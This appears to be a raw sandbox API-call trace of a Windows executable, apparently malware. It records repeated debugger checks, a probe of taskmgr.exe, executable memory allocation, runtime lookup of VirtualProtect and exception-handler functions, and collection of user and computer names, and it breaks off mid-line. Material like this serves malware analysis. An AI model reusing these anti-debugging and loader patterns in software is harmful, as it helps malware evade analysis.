[0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.830] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.831] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] GetLastError () returned 0x0 [0056.832] MsiViewFetch (hView=0xb, phRecord=0x0) returned 0x57 [0056.832] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0056.833] GetProcAddress (hModule=0x76890000, lpProcName="GetMessagePos") returned 0x768c6703 [0056.833] GetMessagePos () returned 0x0 [0056.833] JetBeginExternalBackup () returned 0xfffffc15 [0056.834] GetWindowsDirectoryA (in: lpBuffer=0x12fe48, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0056.834] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\system32\\taskmgr.exe" | out: lpString1="C:\\Windows\\system32\\taskmgr.exe") returned="C:\\Windows\\system32\\taskmgr.exe" [0056.834] GetBinaryTypeA (in: lpApplicationName="C:\\Windows\\system32\\taskmgr.exe", lpBinaryType=0x12fe38 | out: lpBinaryType=0x12fe38) returned 1 [0056.834] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0056.834] GetCaretBlinkTime () returned 0x212 [0056.834] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbc4 | out: ProcedureAddress=0x12fbc4*=0x765e2fb6) returned 0x0 [0056.834] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x280000 [0056.837] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbe4 | out: ProcedureAddress=0x12fbe4*=0x765e2fb6) returned 0x0 [0056.837] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x2a0000 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e395c) returned 0x0 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e33d3) returned 0x0 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e2fb6) returned 0x0 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765d2341) returned 0x0 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765ddb13) returned 0x0 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x772af774) returned 0x0 [0056.838] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x7731ad2e) returned 0x0 [0056.838] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0056.838] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0056.838] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="VirtualAlloc") returned 0x765e2fb6 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="GetCommandLineA") returned 0x765e98ff [0056.839] GetProcAddress (hModule=0x76590000, lpProcName="LoadLibraryA") returned 0x765e395c [0056.839] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0056.840] GetProcAddress (hModule=0x772a0000, lpProcName="cos") returned 0x772e7400 [0056.840] GetProcAddress (hModule=0x772a0000, lpProcName="sin") returned 0x772d41c0 [0056.840] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0056.840] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0056.840] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0056.840] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.840] IsDebuggerPresent () returned 0 [0056.841] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.841] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.842] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.843] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.844] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.845] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.846] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.847] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.848] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.849] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.850] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.851] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.852] IsDebuggerPresent () returned 0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.853] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.854] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0056.855] VirtualAlloc 